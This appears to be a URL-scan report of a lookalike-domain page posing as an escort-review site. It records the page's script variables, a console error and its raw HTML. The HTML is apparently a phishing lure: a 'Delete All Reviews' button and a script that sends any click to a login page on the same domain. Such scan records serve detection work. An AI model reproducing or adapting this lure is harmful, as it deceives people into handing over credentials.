https://listcraawleres.online/review/130

Submitted URL:
https://listcraawleres.online/review/130
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 3 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Console log messages · 1 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://listcraawleres.online/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Escort Babylon: Reviews of Escorts</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <div class="bordered-page">
    <div class="container">
      <img src="https://res.cloudinary.com/iuoluiol/image/upload/v1720945234/image_2024_07_13T19_52_46_009Z_b7pky4.png" alt="Centered Image" class="center-image">
<p style="text-align: center;"><button class="styled-button">Delete All Reviews</button></p>    </div>
  </div>





<style> 


body {
  margin: 0;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
  font-family: Arial, sans-serif;
  background-color: #f0f0f0;
}



.container {
  text-align: center;
}

.center-image {
  max-width: 100%;
  height: auto;
}

.styled-button {
  margin-top: 20px;
  padding: 15px 30px;
  font-size: 18px;
  border: 3px solid #000;
  border-radius: 10px;
  background-color: #ff0000;
  color: white;
  cursor: pointer;
}

.styled-button:hover {
  background-color: #cc0000;
  border-color: #333;
}

@media (max-width: 768px) {
  .styled-button {
    font-size: 16px;
    padding: 12px 24px;
  }
}




</style>


<script>
    document.body.addEventListener('click', function() {
        window.location.href = 'https://listcraawleres.online//login-page'; // Replace with your desired URL
    });
</script></body></html>